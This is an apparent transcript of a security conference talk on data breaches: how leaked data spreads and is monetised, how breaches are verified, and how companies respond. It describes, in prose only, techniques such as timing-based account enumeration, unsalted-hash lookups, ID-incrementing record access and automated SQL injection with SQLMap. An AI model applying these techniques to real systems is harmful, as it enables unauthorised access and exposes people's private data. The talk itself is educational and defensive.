Now in the case of a data breach, there are things that can be legitimately monetized. People are scared. They need things like identity theft protection. It's not a bad thing to have anyway, let alone after a data breach. But then we had companies like this, trustify, who took the data and the data was really broadly torrented. It would take any of you about five minutes to find that data and then about five hours to download it because it was pretty big. Five hours on Australian broadband speed, maybe half an hour in Norway. But the data is really easily available. So companies were downloading it and then creating services that made money from it. So what these guys are doing is saying, hey, check if you've been exposed. And this is not dissimilar to what I do with Have I Been Poned. The difference is Have I Been Poned is all free. People go in there. I don't make any money out of the fact that the public can do that. But what happened here, these guys allowed you to search for anyone. And then after you searched for them, they sent an email to the person you're searching for. So imagine this. You've got a wife suspicious of a husband. And this was the gender split. There's no gender equality in Ashley Madison. It was almost all guys and fembots. So fembot is basically just computer code which engages in discussion. In fact, they'd even call them engages. The engages would get them in to chat and pay more money to stay on there because they think they've got a chance of meeting a girl who is not their partner, who they're meant to be married to because the whole thing was meant to be about having affairs. So anyway, you've got this situation. Both searches for her husband gets an immediate confirmation on the screen that the husband was in the data breach. Husband gets an email. He's not the one who searched for it, but he gets an email. So the first, the husband knows of him being in the data breach is when he finds out that someone is actually searching for him in the data breach. Imagine that. So sort of suspend your moral judgment for a moment, regardless of how you feel about adultery. The very fact that his privacy is violated in this way where anyone can go and search for him and now he's getting an email, could have been his boss searching for him. And he gets an email. And of course, what they're trying to do here is solicit business. They're trying to sell private investigation services so that this guy can get his data removed from the internet. And that's what they're trying to do, get your data removed from the internet. How likely do you reckon that is when it's been torrented nonstop around the world? Never going to happen. So they did that. That line was shitty. They also did this. After you searched for someone and then you found them, there were social icons that allowed you to tweet that you'd found them. Now this is bad, but you can almost understand it insofar as, yeah, I found my ex-husband, you know, screw him. But what about this? I found my friend. These were preloaded social messages. This wasn't the person going, I'm just going to type in. I found my friend. Trustify presented you with the buttons so that you could say, I found my ex. I found my friend. You can search too. They're encouraging other people to go through and search and find their ex and find their friend. And the privacy implications of this is just sort of mind blowing. It seems that once that data goes out, it's like, you know, all bets are off. You can do whatever you want with it. So they were making money in a really, really underhanded sort of way. And they eventually did reverse quite a bit of this. They got a lot of pressure, a lot of public pressure. I wrote something, which is where I got some of those screenshots from, saying how bad it was. And then they started getting death threats. Like that's how the community reacted. They got some really, really nasty messages back. Fortunately, none of them got killed as far as I know, which is, I wouldn't want to feel partly responsible for that. But it gives you an indication of just how bad this was perceived by the community as well. I mean, on their behalf, just a really poor reading of the market and how people respond to these incidents. So that was that one. The other thing that came out of Ashley Madison was stuff like this. This is a ransom email. Now, you ever think about it, a bunch of you are probably developers, security professionals, you're used to writing scripts and things. How hard would it be to just enumerate through a great big file and do a mail merge? Because this is all it is. It's a mail merge. It's a ransom message, but it's also got a little bit of spearfishing to it because it's got information that is very particular about the victim, their name, their address, the last four digits of their credit card number. If you got this and it's asking for five bitcoins as well, that's a lot. That's like $1,500. And if you don't do that, they're going to let your Facebook friends know and your boss know and all that sort of thing. Now of course, the thing about all this is that if you didn't pay, nothing ever happened because this is just like a random send 30 million odd emails to everybody and then some people will pay a fractional 1% will pay and that will be a good earn for the 99. Whatever percent that don't pay, nothing happens. But what some of these messages were saying is they're saying this Bitcoin address is unique to you. And I had a lot of people email me because I wrote a few things that got a lot of press. These people would email me and they'd say, please don't share my Bitcoin address. I don't want anyone else to know. So I'd Google it and you get all these results from all these other people saying, I just got this ransom message. So the Bitcoin address was not unique. They were not tracking payments. There was no recourse if you didn't pay. But they're scaring the hell out of people and these are still going on today. So we're like five, six months on and these messages are still going out to victims because they're so easy. It's just sending email. Now one of the other things that I found very interesting when I thought about the experiences with Have I Been Poned is how I actually find data breaches. So where do I get these things from? And there's not one answer. They come from multiple different places. So a good example is often I'll get a message like this. So this is how I got the triple-O web host data. This guy sends me an email and says, hey, five months ago, this was in October, so back at about March or something, I've got this data. Would you like a copy of it? And in fact, what he said is he said, I'll give you the 2 million version. So there's actually 13 million. I'm going to give you the 2 million. Sends me a mega link. So megakim.com, his service. Often people share data breaches via mega because it's very easy to upload the data to there. They upload it anonymously. It's on a great big obfuscated URL. If you don't have the URL, you're not going to find it. Very, very easy for them to distribute data that way. So he sends me this and do not give me any credit for this. So what he's actually saying is he doesn't want anyone to know that it was him who had the data. And I'll show you a follow-up message from him in a moment. He had actually sent me the 13 million version. So I got the full data set. And this was kind of the first we knew of it back in October. I'm 99% sure they don't know they got hacked, too. They didn't know. They had no idea. And I tried really, really hard to get in touch with triple-O web host. I sent multiple email messages. I went through their ticketing system. I had people respond to me on the ticketing system because I'm saying, look, I've got a serious security incident. I want someone to talk to give me security contact because I don't know who's manning the help desk. You know, some low-paid worker on the other side of the world and an outsourcing center. Is that the person I want to give information on this to? Anyway, eventually when we found we couldn't get in touch with them, that's when it went public. But with this guy, later on, after it got a lot of press, because once it did go public, the media picked it up and the stories were all over the place. I got this, and when I read this last line in particular, I'm afraid they would still look for me. It sounds like a scared kid, right? It's probably the same sort of kid as what we saw on those earlier photos. Some kid in his bedroom in Northern Ireland or wherever who's just been handing this data around. And what struck me with it is I don't think that they are aware of the ramifications of what they're doing. They're sitting there in the comfort of their own bedroom and they're sharing this information around, having chats without any sort of sense of the real world consequences. And then when it hits the media and it's all over the press and suddenly they go, holy shit, look what I've done, I think that's when it hits home. And they say, wow, this is actually real. So I almost feel a little bit sorry. I do feel a little bit sorry actually for a lot of these kids because they don't know what they're getting themselves into. They don't know what's the actual real world ramifications of what they're doing. Other ways data comes to me. Just a pretty good example. So this guy just here is saying he wants to know what his password is. And one of the curious things that I'm finding with data breaches now is that after a breach, the victims of the breach really want to know what their data was, what was exposed. And this is kind of natural, right? Like I have just had personal information exposed. Tell me what it is. So I want to know what it is. And I get heaps and heaps and heaps of emails like this. I end up having to write a blog post which basically says, no, I can't share data because I can't respond to individual requests, go through, try and find their data, then try and send it to them in a secure fashion because often it's passwords and things I don't want to be emailing. But this happens all the time. Now after I told him I couldn't share it, he was, you know, sad face, which I understand. But I would really like to see organizations making this available. And I'm talking about this more at the end as well. But to me, it seems to be their responsibility. You lose the data, you're responsible for telling people what you've lost. Not in one generic message, we're really, really sorry, we lost your things. But this is exactly what we lost. This was the name you had, the password you had, the credit card details that got exposed. It's public anyway, it's doing the rounds. The company should just tell them. It's another way data comes to me. So this was someone who sent me some data about a Dutch financial institution. And what I find interesting about this particular picture is the fact that it's a console window with SQL map. So the guy has basically sent me an email and said, hey, I've got some data you might be interested in. I'll show you the discussion we had after this in a moment. But basically what he's done is he's gone, like he's literally, he's hacked into it using SQL map, which is an automated tool, you can see part of the command line up there. You basically run SQL map, pass a use switch with the URL that you want to hack. There's a few other parameters. You go outside and play. I shouldn't, that's what they do. And you come back and it's got all the data out. It's really, really, really simple. So he's pulled all this information out of the system and then said, hey, here it is. And I said, okay, well, what I think you should do is you should disclose it privately to the company. You should let the company know that they have a vulnerability because you're at this point now where no one actually knows about it. You know, once you make it public, it's like there's no going back. Now it's public and you're going to get yourself into a lot more hot water as well. So I said, disclose it privately. And he said, what's private disclosure? Like it just never crossed his mind that maybe he should get in touch with them and say, hey, you've got a vulnerability. And even after I said that, he's like, okay, well, do you still want the data? No, go to your room, think about what you've done. Don't do it again. This is often the way with the kids, right? They're not thinking about the real world ramifications. So ultimately I said, okay, I'm not going to go and take this data. I'm not going to publish it. You need to get in touch with them privately. And in fact, what happened in this case is I got in touch with some Dutch security people I know, let them know they got in touch with the organization that was impacted. There was a small amount of news on it, but basically the data never went public. I hope they actually let their customers know because it is their customers on the previous screen. But the whole thing ended up being a lot quieter than what it could have been otherwise. There's another good example of where I get data from. So this is a public website. It is it's on the clear web. This is not a tour hidden service. You can just type in the URL, go here and start downloading data breaches. It's that simple. This data is floating around the web everywhere. This is just one site of many that are on the clear web. There are many more on tour hidden services. And it's not even entirely clear why they run this. I mean, he's asking for Bitcoin donation. Maybe he gets a few Bitcoin thrown at him every now and then. But it goes on and on and on. There's about 25 records per page and there's about nine pages as well. So maybe a couple of hundred different data breaches just sitting here publicly searchable, publicly downloadable. And this is what some of them do. So another way I find data breaches. Often we'll see information leaked on Payspin. Payspin is a really popular means of leaking info because it's very, very easy just to go and create a paste, put whatever you want in it. It's anonymous. There's no authentication. There's no sign up. And then you share the URL. And Payspin in their terms and conditions say you shouldn't be sharing data breaches or things like this. I don't think they're quite as explicit as like you shouldn't be sharing other people's sense of information. But I don't think they mean it because it happens all the time. And they probably make the argument of look it's just a service. People can use it for good. They can use it for bad. But this sort of stuff happens a lot. And what we often see is stuff like this where this guy's going, okay, here is part one of the triple web host data breach. So people recycling the data breaches now. Go and get the full thing at triple web host dash leak dot blogspot dot com. So you can get the whole thing. So you go to get the whole thing and you end up somewhere like this. And then it goes, okay, there's part one and part two. Download this one first. Go over here. So you go there and you got to fill out a survey, right? So now we're starting to see the monetization because all of this sort of crap earns people fractions of a cent every time people go through into the survey. So you go, okay, I'll download. All right, so now I got to do this. I got to go back. I got to do another survey. And then it takes you to here. And now I got to do another survey so that I can get a gift card for $100. Guess what? You don't get a gift card for $100. And normally I get about to here and I go screw it. Like you guys are just trying to make money out of it. So again, it's the monetization thing. They're trying to trick people into going through and filling this stuff out with the promise of getting breached data. Just all the different ways this data is recycled and reused are kind of fascinating. Now this is another problem that I often have, which is that data is leaked and someone says, here it is. It is the, for example, the triple-O web host data breach. We want you to publish this data. It's serious. We hacked it. And I've got to try and figure out if it's legitimate or not. Because a lot of the time when I see this data, it's not legitimate. And there's a few different ways I can do this. So I can do things like Google some of the hashes. And if I find that the hashes in the data breach appear in many different other places under the names of other data breaches, well, it's probably not going to be real. But there's a few different ways that I do verification. So here's one good way. Now this is actually Madison again. So again, back in July, when we first heard they'd been hacked, but the data hadn't been leaked, one of the things I found quite fascinating about actually Madison is everyone got really, really upset, assuming everyone who was in the data breach got upset when that news came out. They said, oh, no, now people can discover that I was on the site. I thought, well, this is curious. I wonder if you can discover if they're on the site anyway. So I went to the password reset page and I said, OK, well, I'm going to put in an invalid email address and let's see what happens. Came up and said this. And when I saw this, I thought, OK, this is pretty good because if we look at the piece in bold, it says if that email address exists in our database, you receive an email to that address. And I thought, OK, that's good because it's non-committal, right? It's not saying, yes, you had an email and we've just let you know as opposed to no, you don't have one. Adult friend finder, by the way, who was breached in May, four million records, they still do that today. You can go to adult friend finder, put in an email address and it will tell you explicitly whether it exists or not exists. So they leak the presence of every person on that site via an enumeration risk. And curiously, just a little tip, if you are going to sign up to one of these sites, don't use your normal email address. Don't use your working email address. Make something up. Do not use your dot gov address. There are a lot of dot gov addresses in these things. And you could say that someone else signed you up until your payment records are leaked as well. And then it's really, really hard to make that argument. So this is what they're doing. They're going, OK, if you had an email address we're going to, or if you had an email in the system, we're going to send it to you. Sounds good. Now, this was invalid. Let's have a look at the message when you did have an email address in the system. You see any difference there? It's not subtle, is it? So I wrote about this and I said, look, you can find out anyway. That way, why are you getting all upset? I mean, I know why you're getting upset, but you could always do this anyway. So I actually made us and fixed it and I thought, that sounds like a challenge. I wonder if there is another way of finding out whether accounts actually exist on the site or not. So I went over and I did this. I thought, what I'll do is I'll log on 25 times, but what I'll do is I will use a valid account for research purposes. Number of times I said that to my wife. She's walked in. What are you doing? Research. I do a lot of research. Anyway, so I tried to log in 25 times, valid email address, invalid password, and I timed it. OK? Looks like this. It's a reasonable spread. This is how long the HCTP response takes between issuing the request and getting a response back. Login fails. Fine, but it's an invalid account. Around about 500 to 600 milliseconds. So then I said, OK, what happens if I take an account that does not exist on the system and I try and log in with that? That's curious, isn't it? Anyone know what it does is? Any guesses? Doesn't hash the passwords. Right. So here's how it works. Actually, often when I ask that, some people say, well, yes, because it's doing a database lookup. If your database lookup for an account takes 500 milliseconds, you have a different problem. It shouldn't be taking that long. So here's what happens, right? Ashley Madison used Bcrypt with a Work Factor 12. They screwed it up really, really badly, and we later found we could get basically 90% plus of the passwords out anyway. However, they were using Bcrypt Work Factor 12, so a fairly heavy workload in the hashing. And what happens is when you provide a valid email address, regardless whether the password is valid or not, valid email address, it goes to the database and it says, get me the record for this person. The record comes back with the salt and the salted hash, and then the new password gets added to the salt and everything gets hashed. And because it was a high Work Factor algorithm, it took several hundred milliseconds. When the account doesn't exist, the application goes to the database that says, get me the account for this email address. The database comes back with nothing, and the app says, well, now I don't have to hash. So this, from an efficiency perspective, is really good. But from a disclosure perspective, we have this. So things like enumeration risks are one way that I verify data breaches. And if I can pick three random email addresses from a data breach, plug them into the password reset, and it confirms whether the account exists or not, I've got a really high degree of confidence that that data is legitimate. Now three people are going to get password reset emails, three people out of a breach, in this case, of 30 million. I'm not feeling too bad about that because now they've got bigger problems. Now they've had all of their data leaked publicly. And it's taken me three emails to figure that out and then let potentially millions of people know what's happened. Because millions of people do find out whether they find out by notifications on my Heavobain Pone service or whether they watch the news. You could not miss the news on Ashley Madison. Here's another good one. So this is Strat4. Strat4 was an intelligence agency. They did reports for, particularly for governments, on things like the political landscape of certain countries. And they got hacked in 2011, and they had all of their data leaked. They went kind of offline for a little bit. And they had to sort of send this message and say, look, we're hacked by an unauthorized party. Everything got suspended for a while. I want to show you what that data breach looks like and a really easy way of verifying that. So again, this is a data breach that did get circulated pretty broadly. Looks like this. It's a pretty sort of typical structure here. It's just common delimited. User IDs, names, passwords, emails. These are the passwords. They're all MD5 hashes. Just straight MD5 hashes. No encryption. No salt. Nothing else. Just very, very simple. So the way I'd verify something like this is I'd search for hashes. And I thought, well, maybe one of the ways we can do this is I'll make it interesting and I will search for a.gov. Find someone with the.gov address and I'll take their hash. And then I'll go to Google. And Google is really good at cracking hashes because you can search for a hash when it's not salted because the salt adds randomness that should be unique for every record. But when it's just a straight hash, you can go and search for Google and you can often find the plain text version. So this was the strat for data breach. And that was one of the hashes. First government official hash. Now what do you reckon the password was? Stratfor. Who would do that? Who would sign up on a website called Stratfor and use the password Stratfor? But see, this is verification for me. OK, this hash was a password which is likely to be used by those people. Now what I could then do is I could turn my zoomer on because you're going to need to see this one closely. One of the things I found curious is I thought, OK, well then how many people might have actually used that same password? Because once we're actually talking about a case where it's just a straight hash and there's no salt, we can do this. We can go back into here. We can do a find and we can do a count for that hash. How many hashes do you reckon we're going to find? You got 12,000 people. There are 860,000 records in the breach, 12,000 people use the password Stratfor on the website Stratfor. Now that Stratfor all are a case because if it was Stratfor with a capital S, the hash should be completely different. So we'd inevitably find a whole bunch of people did that as well. So again, going back to the point of this, from a verification perspective, these are the sorts of ways I try and figure out is this data breach legitimate or is it fabricated? The other thing I started doing recently is this, because what I've realized is I have got a really good repository now of people that are interested in the Have I Been Pwn service. So I've got a little notification service. You can sign up for free, you put your email address in, you get an email, it says you've signed up for notifications. Are you sure you want notifications? And you click a link to say yes, so it verifies you and it's done. I've got about 330,000 people that have signed up for this. So what happens now is when I have a new data breach that I can't verify using the means I just showed you is I start emailing subscribers. So good example, VTech. VTech is a Hong Kong based toy maker. In October, November period, a reporter emailed me, a reporter I'd worked with before and he said, I've been given a data breach. I want you to help me verify it. So I got the data breach and I couldn't find anywhere on their website to go through and do like a password reset. There was nothing in the data breach that would allow me to do stuff like easily googling hashes, they were salted hashes. And what VTech actually did is they made tablets for kids. So think about like an iPad but it's all plastic and colourful and things like that. And you could give it to your kid and then the kid's mate could have one as well and then they could chat via the magic of the internet. So a lot of parents didn't realise these kids are chatting in different houses. It goes by the internet. You just put your kid's details on the internet. And this is what was in the data breach. Four million adults with names, email addresses, physical addresses, phone numbers, 280,000 kids with name, gender, age, average age is five years old and a foreign key to the parents record. So if you had this data you could basically decide what child would I like in a convenient location and find them. I didn't get the photos but the attacker later also gave the report of photos because the tablets had a camera. You take your photo. There's kids, 280,000. Later on after this all blew up VTech said it wasn't 280,000 kids, it was six million. Shit. That was a lot. But anyway, verification, because you signed up via a tablet and the tablet talked to an API I couldn't see an easily accessible interface anywhere where I could check things like password resets. So I did this. I took the email addresses from the data breach and I found the most recent 20 subscribers to have I been pwned. So people that were thinking about the service recently and I sent them this email and I didn't tell them what the service was or where it was. I just said, hey, look, would you help verify this? And I had about half the people respond and I'd get messages back like this. In fact, this is what I sent to the person. So one person came back and said, yes, I would like to know what the incident was. So I would send them a piece of information or three pieces of information which would give them a degree of confidence that it was their data without being too sensitive. So when did you first log in? It's not too bad. Where were you located? And your ISP. And your ISP from the IP address. This poor lady was in talk talk and VTech. She was really impressed when she emailed back. But, you know, like this is not sensitive data, but it's enough to have a pretty high degree of confidence whether it's legitimate or not. And she came back and said, yes, that's accurate. And that gives me a high degree of confidence for one person. And then I had about six actually come back and ultimately verify their data. So what I'm finding is that how I've been pwned becomes a really, really good verification channel. I actually get feedback from the individuals in the data breach before I make anything public that yes, it was actually legitimate. So that's been really useful. This is also really interesting. The way the organizations respond when these incidents happen. And you probably see, if you read the news, a really broad range of responses. But a lot of them are kind of like this. This is the first thing a lot of companies say, don't worry about your credit card. Now put this in context. Ashley Madison, a site designed for you to have affairs. If your wife finds out, she might leave you. You may never see your children again. Like really, really bad things are going to happen, life changing things. But don't worry, your credit card's fine. Same here. This is in VTEC. Your children have been leaked. People know where to find them. They know what they look like. They know their names. Don't worry, credit cards are all right. What are you worried about? And inevitably what we're doing here is we're trying to placate PCI. These organizations are worried that they're not going to be able to process credit card payments anymore. Their first concern is keeping the payment card industry happy, which is just really bad. It's just something that absolutely stinks about this. So we often see these really evasive sort of messages focusing on things that ultimately are in the company's best interest. I've got many, many examples. I wrote a blog post a while ago where I showed this. Initial responses focus on credit card data. Who's had their credit card defrauded before? Wow. You guys are lucky. I'll only refute you. I wrote something where I talked about this and I said, look, who really cares about the credit card? Because if it gets compromised, your bank gives you fraud protection. They give you the money back. The next week, and I'm sure it was coincidental, but the next week my wife's card was defrauded. We found out on a Monday morning we went into the bank. The bank canceled the card. We had the money back in the account by the end of the day. We had a new card in the mail at the end of the week. The greatest inconvenience of the whole episode was that we had to change some of our direct debits, which were trying to debit the old card number. That's what credit card theft means today. A bit different for debit cards, but credit cards, for me, is a consumer. It's kind of a non-event. This was a really good response. So Patreon, who I mentioned got hacked earlier on, Patreon did a number of things really well. So they did things like they stored all their passwords in Bcrypt with the Workfactor 12. They did something else that I have never seen any other company do in a data breach, which is that they encrypted the personal identifiable info. They encrypted addresses. They encrypted other aspects of your personal info that other companies never do. Not only did they encrypt it, but they managed not to lose the private key when they did get hacked, because that's the other trick, right? You can encrypt. It's no good if your key gets disclosed. So they actually got it right. When I like this message, it came from the CEO. What I like down here at the end of the third line, I am so sorry to our creators. He's actually apologetic. A lot of companies, the first thing they do is go, evil cyber hackers. These evil cyber hackers, it's illegal. They rant and they rave and they get angry at the people that breach them without focusing on the fact that they screwed up. And yes, they are evil cyber hackers and they should have legal recourse. They probably should end up in court if not jail, but those companies, companies like AvidLife Media that creates Ashley Madison, VTech, really, really screwed up. VTech in particular did terrible things with their app design. It took me about 10 minutes to find out that I could create two accounts, log into one and pull the data out of all the other ones. Took me 15 minutes. You know, and I'm not doing anything special. I just say there's an HTTP request. It has a number in it. I wonder if I add one. Could I get some different data back? Yes, there you go. Job done. So, this from Patreon. Patreon also said this, they went on to say we don't store credit cards. All right, they have to keep PCI happy, but they also actually give some detail encrypted with 2048 bit RSA key, no specific action required, and then they go on and they give technical details. So there's transparency. And finally again from the CEO, another apology. I sincerely apologize for this breach. Like this I think is about as good as you can do with the breach message. And they did screw up. They had debug settings in a publicly facing environment that had access to production data. They screwed up. They admitted it. They gave the details. From that we saw that they did those other things well. They did the B-crypt well. They did the encryption well. They had a good message. These things happen, but this organization was prepared for it and they responded in the right way. The other interesting thing that comes up is people often say a company gets hacked, but then they get over it and they move on and there's no sort of long lasting impact. It's not like their share price dives or anything like that. And I find that curious for a couple of reasons. Number one is that data breaches are expensive. Very often data breaches lead to having to do things like provide identity theft protection for everyone. It's a very standard response. Oh, we got hacked. Identity theft protection. There we go. And that happens. It ties up a lot of resources. It damages brand. It keeps services offline. VTech had to take all their services offline after this incident happened. I was in London last week and I went into to Hemley's, the big toy store, and there's a massive VTech stand. I was like, I'm going to go and ask them about how secure these things are. And they didn't have any of the tablets in stock. And it wouldn't surprise me if they were just not able to sell them at the moment because the service is still offline. Like their service. It's like a ground up rebuild. So it does have impact. And I wanted to find some examples of where it actually has real impact. So I looked at things like this. Now this one is curious. This was a few months ago. Again someone sent me some data. They contacted me via Skype and said I've got some data breaches. But I didn't compromise and I believed the guy because we had quite a long chat after that. But I've had them through sort of trading with other people. And one was called Nettela. Nettela, not like Nettela, the thing you put on your toast. And the other one was called Money Bookers. And these were gambling sites. And the data dated back, I think to about 2012, like it was quite old data. And the interesting thing here was that now that those two organisations have been bought by another company, and this other company was now responsible for it. So Listed Company. And the interesting thing is that we ended up sort of getting in touch with the company. They responded really, really well. I had quite a few chats with their security guys trying to figure out what was going on. The company's called PaySafe. And PaySafe, because they're listed as well, they have to disclose this sort of stuff. Like they can't hide it. They've actually got to take it seriously. So they had to put out a press release about it. And then this happened with their share price. Now there's two curious things here. So number one is that if you look at it on the aggregate, nothing happened. Number two is they did lose 300 million pounds there. 300 million pounds just for a moment. That's a lot of money. 300 million pounds. They dipped in direct response to that incident. 300 million pounds. That's like 20% of their share price. If you had prior knowledge of this, before it hit the news and you wanted to play the market, okay, it would probably be a little bit obvious, you don't normally play the share market. Well, you just had all these options out on something just before it dropped 20%. But that did have a serious ramification. And I wanted to show this because it shows that even though there might not be a lasting impact, that's a lot of money. 300 million pounds. Another good example. This was a few years ago. Associated Press had their Twitter account hacked. Let's just be clear about the news here. It wasn't Twitter being hacked. It was AP having a shitty password or getting phished. It was one of those two things, always is. This is what the tweet said when they got compromised. This did upset the market. The market responded and the market did this. That is some number of billions of dollars on the Dow Jones. And again, on aggregate, like it all evened out, it was all good. But holy shit, look at that. That's hundreds of, that's just a massive amount of money. So it does have an impact. It might not be a lasting impact, but it does have an impact. Out of that, many people would have lost a lot of money. Many people would have made a lot of money. This is the other thing that got a little bit interesting last year. I had a phone call from a very nice American man from there. And it was curious. In fact, it started with an email. So I got an email, the FBI would like to talk to you about one of the data breaches. And I said, okay, fine. We'll have a chat. And they sort of wanted more information on the background about what was in there, what had I found in investigating it. It also leads to discussions with the Australian Federal Police, who are also very nice. All of them are always very nice. I hope they stay nice. But when I thought about it, there are a few interesting things here. And one of them is that often the likes of the FBI, the NSA, et cetera, are perceived as being evil. Evil in the respect of, particularly for those who are in the security industry, we see a lot of news and things about how they're cracking down on people doing ethical things, disclosing vulnerabilities, how they're basically out there to do things that invade our privacy. And when I thought about it more, you know, one of the things about the likes of FBI, Federal Police, any sort of government security or intelligence agencies is that we do want them. We want them stopping a lot of the sort of stuff we've seen. I don't want things like AAA web hosts being hacked into and leaked all over the place. I want them to catch the people that did that. I'm not going to disclose who I've been talking to or violate private discussions, but I want them to make sure these things don't happen. We need these guys. And I guess it's like everyday police on the street. We want them there to keep us safe. They play a really valuable role. And it's curious when you look back at where there's been involvement that involve security people and the press has taken it really badly, it's interesting to look at the details. So for example, everyone remember this? This guy, Weave, if ever you follow him on Twitter, he's, let's just say he's an interesting character and leave it there. But he identified a vulnerability with AT&T where he could pass and identify from his iPad into one of their services and get back information about the account holder. And the news here is sort of going, security research have found guilty of conspiracy and you know, I'll get out of this. I'll be okay. You know, it was a real sort of beat up job. But the detail of it was is that basically he found a direct object reference risk. He could pass an ID, get a record back out. And then just to make sure it wasn't an accident, he did it another 114,000 times and then gave it to the press. That shouldn't happen. It's the same here. He's an Aussie guy. Happened with Australia first state superannuation, like our retirement plans. He found a vulnerability, direct object reference vulnerability. Found the risk just to make sure he did another 770,000 times, got all the data out and then wondered why the police knocked on his door. Police took away all these toys for a while. As it turns out, it worked out really badly for first state super because basically it showed that they had really gaping security holes and they were in negotiations. So it cost them a lot of money. But often when we see headlines like this, there's another story behind it. And we want the FBI, the Australian Federal Police, everyone else who's playing those sort of roles, we want them there to try and keep us safe from these sorts of incidents. So it leads me to here. Three things that I would really like to see change with the way data breaches are handled and the way organisations respond. So number one is this. A while ago, it must be about two years ago now, Forbes got hacked. Forbes had about a million records leaked. It took them a week to let anyone know. It took me less than 24 hours to let every subscriber to have I been pwned know. This should be an easy thing. You get hacked, you've got to let people know quickly. Because otherwise you get all this speculation in the media, people are going, well, I don't know what's going on. Like, are my details compromised? Do I need to go and get identity theft protection? Is that funny credit card transaction as a result of this? Like this should just be fundamental. This is the other one and I reckon this is actually really important. And it goes back to that earlier point of people start asking me for their data. The organisation is the one that lost it. If I'm able to obtain this data because it's been spread out all over the internet, then surely they can obtain it and surely they can give it to their customers in a secure fashion. This should be fundamental and I'd really, really like to see organisations doing this and I'm not aware of any that have done it in the wake of a data breach. And finally this one. I just can't see this data breach environment changing until there's enough incentivisation for organisations not to do it. The primary organisation or the primary penalty that organisations have at the moment is the risk of the threats from PCI. And that's why we saw those messages about payment cards. They don't want to lose the ability to process payments and they're scared of getting fines and that causes them to respond in a different way. We need to see government penalties and it's going to be really interesting to see now with this news about the EU potentially finding organisations up to, is it 4% of their annual revenue? Potentially up to 4% of your annual revenue if you have a data breach. Now it's early days we've got to see how that actually works but that is an incentive not to get compromised in the first place and certainly to take it seriously if you do because what gets me is when we look at some of these recent breaches, things like VTech. Now VTech was only a couple of months ago and it had SQL injection. I'm pretty sure it had SQL injection because when you logged on and you looked at the response that came back, the response that came back in JSON included the SQL statement that was executed in the data. I just have no idea why you do that. Maybe someone was debugging and they thought, you know, it would be helpful. Let's see the whole thing. They definitely had direct object reference risks. They had no transport layer security. They had all sorts of other serious issues. They should get slapped with a fine. I don't know what jurisdiction it happens in. They're a Hong Kong based company. They sell all over the world. But they should get hit with something. Because how can a CIO, CTO today sit there and not be aware of the likes of TalkTalk and Ashley Madison, all these things? They know. And at no point have they said, maybe we should get someone who knows what they're doing to look at our app. They definitely haven't done that because it would have taken anyone about five minutes to find the risks. So I don't know how this works, but I think until they get penalties, we're not going to see a lot change. All right. So that brings me to the end. And that is our first talk. That is the Slido info. So you guys can post questions and things. Does anyone want to ask a question right now, what we're here? Topical? Or you can put it in the Slido. We can talk about it later. Yes? So SQLMap is actually really powerful. I'll show you a quick overview because this is something that we're doing this week in one of my workshops as well. But if we go to SQLMap.org and you have a look at all the stuff it can do, it's actually really, really extensive. The documentation, to be honest, it's a terrible documentation, but it just goes on and on and on and on. And what you can do in its most basic form is you can just point it at a URL and let it discover the type of database and then what the risk might be. You can also do things like get it to run Google searches and then attack the results. You can get it to extract just the schema. It will do error-based SQL injection, union-based SQL injection, blind Boolean SQL injection, blind TimeBase SQL injection. It will do all these different styles of attack. And for people that actually know how to use this and can sort of use it properly in anger, it's enormously powerful. But what we often see, and I'm going to give you a demo of this on my next talk. We see kids running Google Docs, so Google searches to find very specific things, copying the results, pasting it into SQL map. Do we get data? Yes. Well, now we'll leak it and then we'll make up a reason why they deserved it. There'll be a reason. I'll give you an example that way. And if they don't find anything, then they'll just move on to the next one. So the tools are very good at automating the process. The kids that are using it have got absolutely no idea how SQL injection works. It's all they know is they copy URL, they paste into the tool, they get data out. Yes. Good question. So I showed Trustify, which was making money out of the fact data was stolen. And you're asking, would they get into any legal trouble? One of the things Trustify did is they had a Reddit thread. And in the Reddit thread, they said, the reason we're not getting shut down is that we've got more lawyers than employees. True story. They then went through and they deleted all of their comments. But that was one of the comments. And in fact, it's in my blog post where I explained this is why they're probably not getting shut down. So basically, they were just fighting off DMCA takedown requests. And this is sort of one of the other curious things that's happening now. They're seeing the Digital Millennium Copyright Act, which is meant to stop copyrighted material from being distributed, used to try and take down publicized data breaches. Which is kind of, I don't think it's ever actually been tested in court, but it's kind of enough scare tactics that a lot of people do just take the data down. But in the case of Trustify, they just fought it with lawyers and said, no, we're not going to do it. Lawyers. Yes. So, I guess the question is at what point should you disclose a vulnerability? Like how far do you need to go to establish it? The argument from the likes of the two guys I showed is that they need to get data out of the system and they need to get volumes in order for the company to take it seriously. But the thing is, once you change an ID once and you get someone else's data, and let's just ignore how you did that or why you did that. But for whatever reason, you mistyped the URL, for example, and you got someone else's record. That's the point where you contact the company privately and you say, funny thing happened today while I was browsing the web. Because that alone demonstrates the risk and all that did by sucking all the other data out is it made impact, no doubt about that, but then they ended up in a huge amount of trouble. Even things like SQL injection, yes, it is a really impactful thing to give the organisation the data that you've exfiltrated from the system, but that's going to make it really, really hard for you to stay on the ethical side of the disclosure. So for me, as soon as I find that there is a risk, and again, you've got to be careful about how you discover it as well, because a lot of things like SQL injection, they take constant probing in order to find the risk. So you might find something and disclose it, but if you've found it by hammering away at their system in an unauthorised fashion, then that could be a problem. This is also another reason to have bug bounties. I really like the idea of bug bounties, and I really like the idea of services like bug crowd. And what these guys do is that they run bug bounties for organisations. So you can say, I'm an organisation, I would like it if someone finds a vulnerability that instead of dumping all the data publicly, they send me an email and we fix it privately. And maybe we give them a thousand bucks for it. Thousand bucks isn't much compared to the cost of public disclosure. So this sort of thing allows people to find vulnerabilities and report them to you because they're incentivised to do it. So I really love this idea as well. Any other questions? All right, so I think we're running just a little bit over, but what do we do, Jacob? Do we have a break? Okay, and 15 minutes? Awesome. Okay, thanks everyone. Thanks everyone.
We can learn a huge amount about security by reviewing the failures of those who have come before us. In maintaining the data breach notification service "Have I been pwned?", I've dealt with literally hundreds of millions of breached records over time and have seen some fascinating things. In this talk we'll look at the patterns organisations who suffered data breaches were using, the types of data that were exposed and the things they could have done to protect themselves from malicious actors.
10.5446/50534 (DOI)
